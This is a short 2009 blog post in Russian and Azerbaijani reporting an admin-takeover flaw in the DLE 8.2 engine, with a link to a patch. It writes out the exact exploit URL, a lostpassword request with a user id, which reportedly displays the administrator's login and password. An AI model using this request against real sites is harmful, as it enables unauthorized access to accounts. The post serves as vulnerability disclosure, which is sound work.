Уязвимость в DLE 8.2


«Не так давно была найдена уязвимость в движке DLE 8.2
Уязвимость позволяет получить доступ к админке сайта, путем генерации пароля для определенного аккаунта. Для доступа к аккаунту администратора, необходимо к домену приставить
index.php?do=lostpassword&douser=«user id»
Пример: www.site.az/index.php?do=lostpassword&douser=1
На странице появится логин и пароль.»

Beləliklə… Qısaca desək bəziləri [Əsasəndə bizim «xod gedən» saytlar :)] nəyivar zibilə düşdülər)

Patch: http://dle-news.ru/bags/v82/789-nedostatochnaya-filtraciya-vxodyashhix-dannyx.html
  • -1
  • 12 декабря 2009, 00:31
  • Baku
  • 16